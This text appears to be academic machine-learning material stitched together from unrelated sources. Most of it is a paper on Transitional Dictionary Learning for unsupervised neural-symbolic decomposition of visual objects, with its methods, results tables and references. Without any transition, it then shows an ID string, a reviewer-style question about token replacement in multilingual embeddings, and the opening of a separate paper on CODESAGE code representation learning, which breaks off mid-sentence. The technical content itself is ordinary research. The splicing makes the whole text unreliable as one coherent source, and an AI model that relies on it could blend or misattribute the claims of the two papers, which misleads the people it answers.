relations among objects. Mao et al. (2019) learned visual concept embeddings and Cao et al. (2021) learned them as prototypes. Kipf et al. (2020) used contrastive learning to embed concepts and implicit relations, and Wu et al. (2022) employed EBMs to embed concepts and relations for zero-shot inference. Du et al. (2021) also used EBM to represent concepts. LeCun (2022) introduced an EBM-based framework to learn hierarchical planning. In comparison, we aim to learn the seamless transition between neural and symbolic representations unsupervisedly. Unsupervised Segmentation. Segmentation extracts structural information from visual inputs. Lin et al. (2020) used spatial attention to learn scene parsing. Bear et al. (2020) utilized physical properties. Kim et al. (2020) clustered on feature maps, and Van Gansbeke et al. (2021) improved it by contrastive learning. Lou et al. (2022) parsed scene graphs by aligning the image with the dependency graph of a caption. Melas-Kyriazi et al. (2022) used deep spectral methods to segment. The parsed elements in these methods are not reusable; co-part segmentation attempts to address it. Collins et al. (2018) learned visual concepts by NMF. Hung et al. (2019); Choudhury et al. (2021) learned reusable parts by self-supervised learning. Amir et al. (2021) extracted concepts from a pre-trained vision Transformer. Gao et al. (2021) learned co-parts utilizing motions in videos. Ziegler & Asano (2022) uncovered parts with a Sinkhorn-Knopp clustering. Yu et al. (2022) utilized capsule networks to discover face parts and He et al. (2022) learned parts by hierarchical image generation. However, they rely on concrete visual features and learn visual patterns instead of discovering compositionality like us, thus not working on abstract input, as shown in experiments in Section 5. 3 TRANSITIONAL DICTIONARY LEARNING We first introduce the transitional representation and its optimization target in Section 3.1 then optimize this target with our TDL framework based on an EM algorithm in Section 3.2. Finally, we propose the clustering information gain to evaluate the learned representation in Section 3.3. We use this convention if it is not specified separately: superscript \(^i\) denotes \(i\)-arity, superscript \((i)\) with brackets denotes \(i\)-th sample in a dataset, and subscript \(-i\) denotes \(i\)-th visual part in a sample. 3.1 TRANSITIONAL REPRESENTATION Given a visual input \(x \in \mathbb{R}^{H \times W \times C}\), suppose 2D here for simplicity without loss of generality, we can compress it into a low-dimensional embedding \(r = f(x) \in \mathbb{R}^d\) using a NN or other machine learning models \(f\) that minimizes the reconstruction error by \(\min_r \epsilon(g(r), x)\) with a decoder \(g\). As discussed above, such representations lack interpretability, compositionality, and structural information. Alternatively, we can employ a symbolic representation that explicitly identifies structural information. Predicate logic, the dominant and theoretically complete (Newell & Simon 1976) symbolic representation, expresses the input \(x\) as a conjunction of logical statements \(\Omega = \rho_1^1(\cdot) \land \rho_2^1(\cdot) \land \ldots \land \rho_k^1(\cdot) \land \rho_2^2(\cdot) \land \rho_3^2(\cdot) \land \ldots\) that minimizes semantic distance \(\min_\Omega d_S(\Omega, x)\), where \(\rho_k^i\) is the \(i\)-th logical sentence using a predicate of arity \(k\), the number of arguments. Arguments \(\cdot\) can be logic variables, constants, or even logical sentences that form high-order sentences. To simplify the analysis while keeping generality, we assume that an input \(x\) is linearly composed of visual parts \(x_i\) by \(x = \sum_{N_P} x_i\), where \(N_P\) is the number of parts, although non-linear assumptions exist, such as viewing an image as a stack of layers or projection from a 3D space. To create a meaningful logical representation that is semantically close to \(x\), we begin with the entity mappings \(x_i \rightarrow \rho_j^1\), grounding a 1-ary predicate \(\rho_j^1 \in D^1\) of entities from the dictionary \(D^1\), such as \(Cat(x_i)\), \(Tree(x_i)\), \(Person(x_i)\), in \(x_i\). Then, we construct relation mappings with higher-ary predicates, taking 2-ary as an example, \((x_i, x_j) \rightarrow \rho_k^2\), where \(\rho_k^2 \in D^2\), such as \(left\_of(x_i, x_j)\), \(larger(x_i, x_j)\). Finally, we depict the attributes by predicates such as \(Red(x_i)\), \(Length(x_i, 5cm)\). This process is an optimization problem \(\arg \max_\Omega P(\Omega | x, D)\) where \(D = \{D^1, D^2, \ldots\}\) is a dictionary collection of different ary predicates. There are two major drawbacks, which also led to the downfall of symbolic AI. Firstly, symbol grounding that links predicates to visual components is non-trivial. Although it can be automated by supervised learning, annotation is expensive and inflexible. Secondly, designing attribute predicates that capture all the details is impossible. Therefore, we propose a transitional representation, the neural logic variables \( R = \{r_1, r_2, ..., r_{NP}\} \) generated by a model \( f(x; \theta) \) with a hidden dictionary parameterized by \( \theta \) as \( D \). \( R \) is composed of entity vectors \( r_i \in \mathbb{R}^d \) and follows the optimization target. \[ \min_\theta \sum_{i=1}^{N} \epsilon(g(R^{(i)}; \theta), x^{(i)}) + \alpha E_D(d_S(g_D(R^{(i)}; \theta), x^{(i)})) \text{ where } R^{(i)} = f(x^{(i)}, \theta) \] where \( R^{(i)} = \{r_j^{(i)}\}_{j=1}^{NP} \) are variables for \( x^{(i)} \) in dataset \( X = \{x^{(i)}\}_{i=1}^{N} \), we omit the parameters of decomposition model \( f \) and \( g \) that also need to be optimized in this target for simplicity. It minimizes both the reconstruction error of the first “neural” term, where \( g(R^{(i)}; \theta) = \sum_{j=1}^{NP} \hat{g}(r_j^{(i)}; \theta) \) and \( \hat{g}(r_j^{(i)}; \theta) \) is the decoder, and the expected semantic distance of all meaningful concrete dictionaries by the second “symbolic” term. The predicate head \( g_D \) can map \( R^{(i)} \) to logic sentences \( \Omega^{(i)} = g_D(R^{(i)}) \) that maximally preserve the semantics of the input given a concrete dictionary \( \tilde{D} \). \( d_S \) is an ideal metric that can accurately measure whether two representations express the same semantics. The expectation considers all meaningful dictionaries of an input (e.g., different fonts for the same character), while non-meaningful ones are not considered (e.g., the inputs are dogs, the dictionary is for cats). The coefficient \( \alpha \) adjusts the two goals. In practice, we can train an “average” dictionary with transitional representations that have minimal possible distances from all concrete ones, and then align each by fine-tuning. Transitional representation tackles the second problem above by compressing attributes in embeddings and the first problem with unsupervised learning will be discussed in Section 3.2. ### 3.2 Expectation-Maximization for Transitional Representation The first term in Equation 1 can be optimized by the following target (Kreutz-Delgado et al., 2003) \[ \arg\min_\theta \sum_{i=1}^{N} \epsilon(x^{(i)}, \sum_{j} \hat{g}(r_j^{(i)}; \theta)) + \lambda \sum_{j} |r_j| \] optimizes the hidden dictionary \( \theta \) by minimizing the reconstruction error from visual parts. However, the key challenge comes from the second term. We consider \( R = \{r_i\}_{i=1}^{NP} \), or its corresponding visual parts, as a bag of words for the image \( x \) that implicates hidden logical sentences \( \Omega_R = g_\theta(R) \), where the optimal \( \theta^* = \arg\min_\theta E_D[d_S(g_D(R), g_\theta(R))] \). As we only need to consider meaningful dictionaries \( \tilde{D} = \arg\min_{\tilde{D}} d_S(g_D(R), x) \) that allows semantically equivalent representations of input \( x \), an alternative target for Equation 1 is: \[ \min_\theta \sum_{i=1}^{N} \epsilon(g(R^{(i)}; \theta), x^{(i)}) + \alpha d_S(x^{(i)}, g_\theta(R^{(i)})) \] We can reasonably assume that \( d_S(x^{(i)}, g_\theta(R^{(i)})) \propto -P(\Omega_{R^{(i)}}|x^{(i)}, \theta) \) where meaningful logic variables and relations are more likely to appear in the dataset than non-meaningful ones, i.e., reusable and compositional. In other words, the optimal dictionary \( \theta^* \) maximizes the likelihood of the dataset. By regarding \( x^{(i)} \) as a visual sentence composed of visual words \( R^{(i)} \) and dataset \( X \) as a visual corpus, we optimize the second term in the alternative target via EM algorithm inspired by the Unigram Language Model (ULM) (Kudo, 2018) which maximizes the likelihood of the dataset by iteratively updating the dictionaries given decomposed visual parts using current dictionary \[ \arg\max_\theta L = \sum_{i=1}^{N} \log P(\Omega_{R^{(i)}}|x^{(i)}, \theta) \] The likelihood of the dataset is computed as the summation of the log-likelihood of the logic representations of all sample \( x^{(i)} \) from 1 to \( N_A \) arities by \( L = \sum_{i=1}^{N} \sum_{j=1}^{NP} \log P(\Omega_{R^{(i)}}|x^{(i)}, \theta) \). For 1-ary, we follow ULM by \( \log P(\Omega_{R^{(i)}}|x^{(i)}, \theta) = \sum_{k=1}^{NP} \log P(r_k^{(i)}) \), for 2-ary, the Markov assumption for sequential data is not suitable, thus we use a joint probability \( \log P(\Omega_{R^{(i)}}|x^{(i)}, \theta) = \sum_{p=1}^{NP} \sum_{q=1}^{NP} \log P(r_p^{(i)}, r_q^{(i)}) \), and the same applies for higher arities. The optimization targets in Equations [2] and [3] give our Transitional Dictionary Learning (TDL) framework. Equation [3] can be optimized by clustering all decomposed visual parts, pairs of parts, etc. The complexity increases exponentially with the arity which is unacceptable despite low-ary is adequate to provide a graph-level representation power, we use techniques like online clustering and random sampling to improve the efficiency that are discussed later in Section [4.2]. Further discussion of the limitations and the broader impacts of the TDL framework can be found in Appendix [4]. ### 3.3 Clustering Information Gain We wish that the learned predicates are reusable and compositional, the decomposed parts and pairs of the test set should be clustered in as few centroids $C$ as possible. Thus, we propose Clustering Information Gain (CIG) by comparing the Mean Clustering Error (MCE) of the decomposed parts in the test set, marked $MCE = \sum_{i=1}^{N} \sum_{j=1}^{N_P} (\min_{c \in C} ||r_j^{(i)} - c||_2)/N_P)/N$ with the random decomposition $MCE_{rand}$, which is a lower bound when the decomposed terms are randomly scattered, while the best case of MCE is 0 when the parts match perfectly learned predicates. CIG is given by $CIG = 1 - MCE_{model}/MCE_{rand}$ normalized between $[0, 1]$. See Appendix [1] for more details. ### 4 Method Figure 2: Overview of our architecture. The decomposition process takes $K$ steps to iteratively refine the generated visual parts. $N_P$ models generate in parallel, each generates one part and communicates through “Broadcast”. The mapped representations will be stored in a memory bank for clustering. To implement the TDL, we need an encoder $f : x \rightarrow R$ that decomposes the input $x$ into $R = \{r_i\}_{i=1}^{N_P}$ where each $r_i$ decoded by a decoder $g : r_i \rightarrow m_i$ into a visual part $x_i = m_ix$, $m_i \in [0, 1]^{H \times W \times C}$ is a mask. Inspired by Wu et al. (2022), we adopt a U-Net-based diffusion model Song et al. (2021) to iteratively refine the generated mask, the encoder downsamples the $x$ to the embedding $r_i$ which upsampled by the decoder as $m_i$. The model iterates $K$ steps. $N_P$ copies of the model sharing the same parameters, generate $N_P$ masks in parallel with each produces one mask. At each step, for model $i$, the mask $m_i(t)$ generated in the previous step (a random mask for the first step) and other feature maps, such as other models’ output, are inputted, to produce an updated mask $m_i(t + 1)$. After $K$ steps, the model outputs $N_P$ visual parts and the corresponding representation $R$. To generate multiple meaningful visual parts at the same time, we propose a game-theoretic method in Section [4.1] inspired by Gemp et al. (2021) who model PCA as a competitive game of principal components. We regard the decomposition process as a cooperative game of visual parts that converge in $K$ steps to cooperatively reconstruct the input while competing with each other to avoid repetition and so on. Each part is adjusted by a “player”, one of the $N_P$ copies of the model. With the visual parts generated, we use prototype clustering to implement the EM algorithm in Section [4.2]. We also introduce a shape score to measure model performance and serve as a reward to tune the unsupervised learned model with reinforcement learning in Section [4.3]. Figure 2 shows an overview of our method. 4.1 Game-theoretic Decomposition A player model adjusts the generated visual parts to maximize the utility modeled by a GT loss $$L_{GT} = L_{Rec} + \alpha_1 L_{overlap} + \alpha_2 L_{resources} + \alpha_3 L_{norm}$$ (4) evaluates the equilibrium state composed of $N_P$ generated parts $\tilde{x} = (x_1, x_2, ..., x_{N_P})$, in detail: **Reconstruction Error.** $L_{Rec}$ evaluates the reconstructed input $\tilde{x} = \sum_i^{N_P} x_i$ using a combination of focal loss (Lin et al., 2017) and dice loss (Milletari et al., 2016). **Overlapping Penalty.** $L_{overlap} = \sum_{H,W,C} \max(0, q_R - |m_i|)$ introduces a competition between players that avoids overlap between parts by penalizing redundant parts. **Resources Penalty.** $L_{resources} = \sum_i^{N_P} \max(0, q_R - |m_i|)$ where $q_R \in \mathbb{R}$ is the quota of a player, prevents one player from reconstructing everything while others output empty. The quota restricts one player from having enough resources to output the entire input, thus requiring cooperation. **L2 Norm.** $L_{norm} = \sum_i^{N_P} ||\tilde{m}_i||^2_2$ where $\tilde{m}_i$ is the unactivated mask before input into the Sigmoid function, which can simplify the search space of the model to accelerate convergence. See Appendix E for further details. We follow SMaLD (Song et al., 2021) to train a scoring network $\nabla m_i(t) L_{GT} = f_S(s_i(t); \theta, \phi)$, where $\phi = \{\phi^i\}_{i=1}^{N_A}$ are prototype dictionaries from 1 to $N_A$ arities that will be discussed in Section 4.2 to approximate the gradient of optimal move for each player $i$ that maximizes utility $-L_{GT}$. The input state $s_i(t) = (e_i(t), \tilde{x}_i(t))$ includes the feature map $\tilde{x}_i(t) = \text{concat}(x; m_i(t); \sum_k \neq i m_k(t), ...)$ that contains the input, the current mask, and the moves of other players (i.e., “broadcast”), and an embedding $e_i(t) = e_i^{\text{time}}(t) + e_i^{\text{pid}} + e_i^{\text{pred}}(t)$ covers a time step $e_i^{\text{time}}(t) \in \mathbb{R}^{d_{emb}}$ and player index $e_i^{\text{pid}} \in \mathbb{R}^{d_{emb}}$ from learned embedding tables, and a predicate embedding $e_i^{\text{pred}}(t) = \sum_{\sigma \in \Phi} P(\sigma|x_i(t)) \sigma$ computed for every step. The move sampled by Langevin dynamics $m_i(t+1) = m_i(t) + \epsilon \nabla m_i(t) L_{GT} + \sqrt{2\epsilon} z(t), z(t) \sim N(0, I), t = 0, 1, ..., K$ where $\epsilon$ is the step size. A loss term $L_{SMaLD}$ from the SMaLD paper can be used to minimize $E[||\nabla m_i(t) L_{GT} - f_S(s_i(t); \theta)||^2]$ to train the scoring network to give good approximations. We apply this term as a regularization to form Decomposition Loss $L_{Decomposition} = L_{GT} + \beta L_{SMaLD}$ in Figure 2. Further details can be found in the Appendix A. 4.2 Online Prototype Clustering We cluster $R$ to implement the EM algorithm in Equation 3. As discussed in Section 3, we learn multiple dictionaries for different arities. Each dictionary is composed of prototypes $\phi^i \in \mathbb{R}^{N_\phi \times d_\phi}$ where $N_\phi$ is the dictionary size and $d_\phi$ is the dimension of the prototype. We train a predicate head for each dictionary; for example, for 1-ary, $\mu^1_i = f_\mu^1(r_i)$ maps a neural logic variable $r_i$ to a representation $\mu^1_i \in \mathbb{R}^{d_\mu}$, for 2-ary, $\mu^2_i = f_\mu^2(r_i, r_j)$ maps a pair $(r_i, r_j)$. In our work, mappers are implemented as convolution layers on visual parts and their combinations, e.g., $\mu^2_k = f_\mu^2(x_i + x_j)$. We perform an online clustering during training by maintaining a FIFO memory bank $M = \{M^i\}_{i=1}^{N_A}$ where $M^i \in \mathbb{R}^{L_M \times d_\mu}$ that adds new terms $\mu^i$ after each training step. Similar to Caron et al. (2018), we run K-Means for every one or a few training steps after the warm-up epochs, in a set $\mu^i + M^i$ for each dictionary, where, taking 1-ary as an example, $\mu^1 = (\mu^{1(1)}, \mu^{1(2)}, ..., \mu^{1(B)})$ is the set of 1-ary representations in an input batch of length $B$. $\mu^i$ has gradients while $M^i$ does not. We drop unwanted terms, such as empty ones, and randomly sample, for example, 30% pairs to increase efficiency. The K-Means output assignments $C^i$ for each term in $\mu^i$, we make pseudo-labels $Y^i$ for prototypes in the dictionary $\phi^i$ by assigning them to their nearest clustering centroids from $C^i$. Then we minimize the distance between prototypes and their assigned centroids in latent space by Cross-Entropy (CE) loss $\min_{\phi, \theta} L_{CE} = \text{CELoss}(\text{dist}(\mu^i, \phi^i), Y^i)$ where dist is a distance metric (e.g. L2 distance). The Clustering Loss is the sum of the CE loss for all dictionaries $L_{Clustering} = \gamma \sum_{i=1}^{N_A} L_{CE}$. We optimize it with the decomposition loss as $L_{TDL} = L_{Clustering} + L_{Decomposition}$ to implement the TDL framework. More details can be found in the Appendix [A.2]. We visualize the latent space of a model trained in LineWorld for all the decomposed parts of the test set in Appendix [D] by tSNE, where we can see that the predicates in the dictionary are learned as different clusters, while the baseline, UPD, does not provide predicate information and shows a less organized latent space. 4.3 Reinforcement Learning and Shape Score We employ PPO (Schulman et al., 2017) to tune an unsupervised learning model by regarding the decomposition process as an episode. We use a heuristic shape score to evaluate the decomposed part by 3 factors. (1) Continuity $R_{\text{cont}}$: the shape is not segmented and is an integral whole. $R_{\text{cont}} = \frac{\max(A_C)}{\sum(A_C)}$ where $A_C$ is the list of contoured areas for segments in a part. $R_{\text{cont}} = 1$ if the part is not segmented. We use `findContours` in OpenCV to obtain the segments for 2D data and DBSCAN for 3D after converting to point clouds. (2) Solidity $R_{\text{solid}}$: no holes inside a part. $R_{\text{solid}} = \frac{A_P}{\sum(A_C)}$ where $A_P$ is the space or area of the part. $R_{\text{solid}} = 1$ if there is no hole. (3) Smoothness $R_{\text{smooth}}$: the surfaces or contours of the part are smooth. $R_{\text{smooth}} = \frac{\rho_S}{\rho_O}$, where $\rho_S$ is the perimeter of the smoothed largest contour and $\rho_O$ is for the original contour. We apply RDP to smooth 2D data and alpha shape for 3D. The shape score $R_S = R_{\text{cont}} \times R_{\text{solid}} \times R_{\text{smooth}}$ normalized between 0 and 1. It can also be used to measure model performance. See Appendix [J] for more details. 5 Experiments Figure 3: Examples from OmniGlot test set. Our method generates multiple interpretable strokes to reconstruct the input hand-written characters. As a comparison, the baseline methods segment the input into colored parts that are not valid strokes revealing a failure in learning compositionality. In Section [5.1], we present our experiment setup to assess whether models can learn meaningful components in abstract objects without supervision, results discussed in Section [5.2]. We then evaluate the learned representations by pre-training the models in an unsupervised manner and fine-tuning them for downstream tasks in Section [5.3]. Finally, we conduct a human study in Section [5.4]. 5.1 Experiment setting We use three abstract compositional visual object datasets as shown in Figure [1] where parts cannot be separated by edges, features, colors, etc. Such contiguous shapes can only be decomposed by knowledge of compositionality, thus excluding confoundings. **LineWorld** is generated by the babyARC engine (Wu et al., 2022), consisting of images with 1 to 3 non-overlapping shapes made up of parallel or perpendicular lines. **OmniGlot** (Lake et al., 2015) contains handwritten characters. **ShapeNet5** is composed of 3D shapes in 5 categories (bed, chair, table, sofa, lamp) from ShapeNet (Chang et al., 2015) voxelized by binvox (Min, 2004 - 2019). We replace 2D conv layers with 3D when using this dataset. We create three downstream tasks based on them in Section [5.3]. We compare three state-of-the-art unsupervised part segmentation methods: **DFF** (Collins et al., 2018) clusters pixels by non-negative matrix factorization (NMF) on the activations of the last conv layer; **SCOPS** (Hung et al., 2019) and **UPD** (Choudhury et al., 2021) learn to produce a $k$ channels heatmap of parts self-supervisedly. The baselines require pre-trained visual backbones. Following we use VGG19 for 2D data and MedicalNet [Chen et al., 2019], a ResNet-based high-resolution 3D medical voxel model, for 3D. We conducted hyperparameter searches for baselines to get their best results. Further details of the setting are provided in the Appendix B. 5.2 UNSUPERVISED LEARNING OF TRANSITIONAL REPRESENTATION | | LineWorld | OmniGlot | ShapeNet5 | LW-G | OG-G | |----------|-----------|----------|-----------|------|------| | | IoU CIG SP MAE CIG SP IoU CIG SP IoU Acc. IoU | | AE | 97.7 - | 0.9 - | 85.1 - | - | - | | DFF | - 33.1 38.3 | - 36.9 33.3 | - 20.1 19.2 | 43.1 28.8 | 42.8 | | SCO. | - 35.7 42.4 | - 38.6 38.9 | - 23.1 24.3 | 46.8 26.4 | 46.9 | | UPD | - 36.3 42.8 | - 42.8 37.4 | - 25.4 22.6 | 46.2 28.7 | 48.9 | | Ours | 94.3 58.0 82.6 | 1.8 68.5 77.6 | 79.8 54.6 60.1 | 78.4 74.8 | 75.9 | | w/o RL | 93.7 57.0 71.9 | 2.0 65.1 68.0 | 78.8 52.9 54.4 | 78.2 74.3 | 75.1 | Table 1: Results on unsupervised learning and symbol grounding. SP represents the shape score. MAE and IoU for unsupervised learning are reference-only for comparison with a reference AutoEncoder (AE). Ours and w/o RL are our models with and without RL tuning. We compare DFF [Collins et al., 2018], SCOPS (SCO.) [Hung et al., 2019], UPD [Choudhury et al., 2021]. The results are presented in the first three columns of Table 1. We train Auto-Encoders as a reference to see if the generated parts match the input and whether the transitional representation preserves high-dimensional information. The LineWorld and ShapeNet5 inputs are binary, so we use IoU for a better intuitive. CIG is introduced in Section 3.3 and the shape score (SP) is discussed in Section 4.3. Our model significantly outperforms the baselines with 58.0, 68.5, 54.6 CIG, and 82.6, 70.6, 60.1 SP in the three datasets, respectively. Even without reinforcement learning, the advantages remain. The low reconstruction error of 94.3 IoU, 1.8 MAE, and 79.8 IoU indicates the preservation of high-dimensional information. This is because the baselines depend on concrete visual features such as edges, colors, textures, etc., enabled by pre-trained vision backbones, to identify the boundaries of parts, which are absent in our datasets. For instance, there is no explicit color or texture difference between strokes in a handwritten character, and seems like contiguous integrity, thus can only be distinguished by the knowledge of strokes, which is learned via discovering compositional patterns. Figure 3 shows a comparison in the OmniGlot test set. See more samples in the Appendix M. 5.3 ADAPT TO DOWNSTREAM TASKS | | Bed | Lamp | Sofa | Table | |----------|-----|------|------|-------| | | IoU CIG SP IoU CIG SP IoU CIG SP IoU CIG SP | | w/ PT | 67.3 48.1 52.9 61.1 42.1 49.1 62.2 46.8 45.2 68.3 50.1 54.6 | | w/o PT | 18.1 19.0 13.2 18.3 19.9 14.6 21.5 18.9 19.8 19.9 22.1 17.9 | Table 2: Transfer learning for our method on the ShapeGlot setup. “PT” means Pre-Training. Symbol Grounding. We design two symbol grounding tasks: LW-G and OG-G. LW-G synthesized with babyARC while preserving the shape masks (e.g. lines) and the pair-wise relation annotations (e.g. perpendicular and parallel) from the engine as labels. The goal is to predict the shape masks and classify the pair-wise relations. We aligned the predicted mask with the ground truth by the assignment with minimal overall IoU before computing the metrics. We pre-train the models on LineWorld and add a relation prediction head on the top of baselines while our method directly adapts the 2-ary predicate head for relations classifying. OG-G is a subset of OmniGlot with the provided stroke masks as ground truth to predict. We align prediction and ground truth as LW-G. We pre-train models on OmniGlot without OG-G samples. We show examples of LW-G and OG-G in Appendices. As shown in Table 1 under LW-G and OG-G, we achieve 78.4 IoU, 74.8 Acc. in LW-G and 75.9 IoU in OG-G, outperforming baselines whose relation prediction did not converge due to incorrect segmentations. This demonstrates that the learned transitional representation enables smooth transfer to a concrete set of symbols, as hypothesized in Section 3.1. **Transfer Learning.** Following ShapeGlot (Achlioptas et al., 2019), we pre-train with shapes from “chair” and other 4 similar categories, then transfer to 230~550 samples from unseen categories “Bed”, “Lamp”, “Sofa”, “Table”. We compare our method with and without pre-training. The results in Table 2 demonstrate that the learned representations are reusable and effectively generalized to unseen classes. Without pre-training, the samples for each class were not sufficient to converge. ### 5.4 Human Evaluation ![Figure 4: Left: Results of the human evaluation. Right: The qualitative scores compared to metrics.](image) **Human Interpretability.** We conduct a human evaluation to evaluate our method and the baselines by humans. We randomly selected 500 samples from the OmniGlot test set and the decomposition results for each method. We use the Google Vertex AI (Google, 2021) data labeling service to evaluate the results as an image annotation task with three annotators. Annotators are given decomposed samples and asked to provide one of four opinions, examples of which can be found in Appendix K as outlined in an instruction that must be read before the task begins. The 2000 samples are shuffled and then randomly assigned to the annotators. The results in Figure 4 left show a much better interpretability of our method, while ~65% of the baseline results are not considered strokes. **Interpretability vs. Metrics.** We further train 6 more models, in addition to the 4 models in Section 5.2, to get near-even distributed SP and CIG by early stop. We then conduct human evaluations in the same way as above. We assign points for each sample by Non-stroke:0, Unnatural:1, Acceptable:3, Good:5, then average them as scores for each model. And compare the scores with the metrics of each model in Figure 4 right, which shows that SP and CIG are positively correlated with human interpretability, which can be used as reliable predictors of interpretability. ### 6 Conclusion This paper presents the TDL framework, which uses an EM algorithm to learn a neural-symbolic transitional representation that incorporates structural information into representations. We introduce a game-theoretic diffusion model with online prototype clustering to implement TDL and assess by proposed metrics, clustering information gain, and shape score. We evaluate our method on three abstract compositional visual object datasets, using unsupervised learning, downstream task experiments, and human assessments. Our results demonstrate that our method largely outperforms existing unsupervised part segmentation methods, which rely on visual features instead of discovering compositionality. Furthermore, our proposed metrics are in agreement with human judgment. We believe that our work can help bridge the gap between neural and symbolic intelligence. 7 REPRODUCIBILITY STATEMENT To guarantee the reproducibility and completeness of this paper, we provide the full details of our model architecture and implementation in the Appendix A. Appendix B contains information about the generation or preprocessing of samples for each dataset and the split used in each experiment. Appendix C contains our settings for hyperparameter search and our hardware platform information. The tricks we used to calculate the GT loss are included in Appendix E. We also make our code and data publicly available for readers to reproduce our work. REFERENCES Panos Achlioptas, Judy Fan, Robert Hawkins, Noah Goodman, and Leonidas J Guibas. Shapeglot: Learning language for shape differentiation. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 8938–8947, 2019. Rakesh Agrawal, Tomasz Imieliński, and Arun Swami. Mining association rules between sets of items in large databases. In Proceedings of the 1993 ACM SIGMOD international conference on Management of data, pp. 207–216, 1993. Amazon. Amazon mechanical turk. https://www.mturk.com/, 2005. Shir Amir, Yossi Gandelsman, Shai Bagon, and Tali Dekel. Deep vit features as dense visual descriptors. arXiv preprint arXiv:2112.05814, 2(3):4, 2021. Saeed Amizadeh, Hamid Palangi, Alex Polozov, Yichen Huang, and Kazuhito Koishida. Neuro-symbolic visual reasoning: Disentangling. In International Conference on Machine Learning, pp. 279–290. PMLR, 2020. Daniel Bear, Chaofei Fan, Damian Mrowca, Yunzhu Li, Seth Alter, Aran Nayebi, Jeremy Schwartz, Li F Fei-Fei, Jiajun Wu, Josh Tenenbaum, et al. Learning physical graph representations from visual scenes. Advances in Neural Information Processing Systems, 33:6027–6039, 2020. Yoshua Bengio, Aaron Courville, and Pascal Vincent. Representation learning: A review and new perspectives. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(8):1798–1828, 2013. doi: 10.1109/TPAMI.2013.50. Lukas Biewald. Experiment tracking with weights and biases, 2020. URL https://www.wandb.com/. Software available from wandb.com. Kaidi Cao, Maria Brbic, and Jure Leskovec. Concept learners for few-shot learning. In International Conference on Learning Representations, 2021. URL https://openreview.net/forum?id=eJIJF3-LoZO. Mathilde Caron, Piotr Bojanowski, Armand Joulin, and Matthijs Douze. Deep clustering for unsupervised learning of visual features. In Proceedings of the European conference on computer vision (ECCV), pp. 132–149, 2018. Angel X Chang, Thomas Funkhouser, Leonidas Guibas, Pat Hanrahan, Qixing Huang, Zimo Li, Silvio Savarese, Manolis Savva, Shuran Song, Hao Su, et al. Shapenet: An information-rich 3d model repository. arXiv preprint arXiv:1512.03012, 2015. Sihong Chen, Kai Ma, and Yefeng Zheng. Med3d: Transfer learning for 3d medical image analysis. arXiv preprint arXiv:1904.00625, 2019. Xinyun Chen, Chen Liang, Adams Wei Yu, Denny Zhou, Dawn Song, and Quoc V. Le. Neural symbolic reader: Scalable integration of distributed and symbolic representations for reading comprehension. In International Conference on Learning Representations, 2020. URL https://openreview.net/forum?id=ryxjnREFwH. Junyan Cheng, Iordanis Fostiropoulos, and Barry Boehm. Gn-transformer: Fusing sequence and graph representation for improved code summarization, 2021a.
vfzRRjumpX
About not using random token replacement, this makes a lot of sense to me. But we would probably have the same problem for natural language, if we consider multiple languages, right? Is the same practice common in training multi-lingual text embeddings?
CODE REPRESENTATION LEARNING AT SCALE Dejiao Zhang* & Wasi Uddin Ahmad* {dejiaoz,wuahmad}@amazon.com Ming Tan & Hantian Ding {mingtan,dhantian}@amazon.com Ramesh Nallapati & Dan Roth & Xiaofei Ma & Bing Xiang {rnallapa,drot,xiaofeim,bxiang}@amazon.com AWS AI Labs ABSTRACT Recent studies have shown that code language models at scale demonstrate significant performance gains on downstream tasks, i.e., code generation. However, most of the existing works on code representation learning train models at a hundred million parameter scale using very limited pretraining corpora. In this work, we fuel code representation learning with a vast amount of code data via a two-stage pretraining scheme. We first train the encoders via a mix that leverages both randomness in masking language modeling and implicit structure and semantic aspects of programming language. We then enhance the representations via contrastive learning with hard negative and hard positive constructed in an unsupervised manner. We establish an off-the-shelf encoder model that persistently outperforms the existing models on a wide variety of downstream tasks. To comprehend the factors contributing to successful code representation learning, we conduct detailed ablations and share our findings on (i) a customized and effective token-level denoising scheme for source code; (ii) the importance of hard negatives and hard positives; (iii) how the proposed bimodal contrastive learning boost the cross-lingual semantic search performance; and (iv) how the pretraining schemes decide the downstream task performance scales with the model size. 1 INTRODUCTION Large language models (LLMs) pretrained on a massive amount of source code have reshaped the landscape of code generation (Chen et al., 2021; Chowdhery et al., 2022; Li et al., 2023 inter alia). As an example, the recent release of a 6TB dataset (Kocetkov et al., 2022) comprising source code under permissive licenses play pivotal roles in promoting the advancement of code language models in present times. Nonetheless, these large corpora are not fully utilized to develop general-purpose Programming Language (PL) embedding models. To date, most PL embedding models (Feng et al., 2020a; Guo et al., 2021; 2022, inter alia) have no more than 125M parameters and are primarily trained on a few millions of training examples, e.g., CodeSearchNet (Husain et al., 2019). Despite the undeniable significance of large-scale data, it’s imperative to acknowledge the vital role of pretraining objectives. The prevailing approach for pretraining a bidirectional Transformer encoder to learn representations is through the optimization of a masked language modeling (MLM) objective, as proposed by (Deylin et al., 2019b). The masking scheme in the standard MLM objective follows an 80-10-10 practice. However, we have noticed that such a masking scheme leads to the development of suboptimal code embedding models. Since code snippets contain both natural language (NL) statements (i.e., docstrings, comments) and pure code, hence replacing masked tokens with a random token following the 80-10-10 convention could result in replacing an NL token with a PL token, and vice versa (see statistics in Appendix A.3). We speculate such co-occurrence of PL and NL together with the syntax nature of source code make it easier to disrupt both the semantics and structure of the masked code, resulting in sub-optimal learning of the language model. *Corresponding authors with equal Contribution. 1 Code and models can be found at https://code-representation-learning.github.io/ 2 Under this scheme, 80% of the randomly selected tokens for prediction are replaced with the [MASK] token, 10% are substituted with random tokens, and the remaining tokens remain unchanged. While MLM pretraining yields contextual token representations, most downstream discriminative tasks primarily function at the sequence level. When the objective is to enhance the representation discrimination power for immediate application in sequence-level tasks, contrastive learning (CL) emerges as the go-to approach. Existing works have employed unimodal CL (using Code-Code pairs) (Guo et al., 2022; Jain et al., 2021) or bimodal CL (using Text-Code pairs) (Li et al., 2022) for representation learning. In unimodal CL, a popular choice is to utilize dropout augmentation (Gao et al., 2021) to construct positive code pairs. However, we found that dropout augmentation suffers from supporting long training process, also reported by Zhou et al. (2022). In contrast, bimodal CL becomes an appealing choice, primarily because of the availability of naturally occurring pairs. Prior studies utilize functions and their corresponding docstrings to establish the bimodal training pairs. Nonetheless, our preliminary experiments indicate that substantial overlap between docstrings and function signatures simplifies the contrastive learning process (see statistics in Appendix A.6). To this end, we present CODESAGE, a bidirectional encoder representation model for source code. We pretrain CODESAGE using a two-stage training scheme with a large amount of customized pre-training data (Kocetkov et al., 2022). We depict the key ingredients of CODESAGE in Figure 1. We first train the 